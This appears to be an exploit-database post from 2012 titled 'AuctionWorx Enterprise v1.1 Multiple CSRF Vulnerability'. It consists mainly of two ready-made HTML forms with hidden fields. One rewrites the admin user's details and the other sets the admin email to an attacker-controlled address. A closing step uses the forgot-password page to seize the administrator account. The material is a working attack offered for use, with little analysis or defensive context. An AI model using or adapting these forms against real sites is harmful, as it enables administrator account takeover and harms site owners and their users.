facebook facebook twitter rss

AuctionWorx Enterprise v1.1 Multiple CSRF Vulnerability

Author: AtT4CKxT3rR0r1ST , Published: 01-06-2012
AuctionWorx Enterprise v1.1 Multiple CSRF Vulnerability
====================================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : http://www.rainworx.com/AuctionWorx
.:. Tested On Demo : http://www.auctionworx.com/
####################################################################

===[ Exploit ]===

Change Account Admin
=====================

<form method="POST" name="form0" action="http://SITE/Admin/EditUser/1">
<input type="hidden" name="userName" value="admin"/>
<input type="hidden" name="Comment" value="......"/>
<input type="hidden" name="Email" value="UR@Email.com"/>
<input type="hidden" name="Newsletter" value="false"/>
<input type="hidden" name="AcceptPayPal" value="false"/>
<input type="hidden" name="PayPal_Email" value="......"/>
<input type="hidden" name="AllowInstantCheckout" value="false"/>
<input type="hidden" name="PaymentInstructions" value="......"/>
<input type="hidden" name="FirstName" value="Mohamad"/>
<input type="hidden" name="LastName" value="Hussien"/>
<input type="hidden" name="Save" value="Save"/>
</form>

</body>
</html>

Change Email Admin
==================

<form method="POST" name="form0" action="http://SITE/Account/AccountSettings">
<input type="hidden" name="id" value="1"/>
<input type="hidden" name="Newsletter" value="false"/>
<input type="hidden" name="Email" value="UR@Email.com"/>
<input type="hidden" name="Save" value="Save"/>
</form>

</body>
</html>


When You Apply The Exploit Go To [http://SITE/Account/ForgotPassword] And Join Your Email To Forget Passowrd

####################################################################


# 1337day.com [2012-06-01]

Like us on Facebook :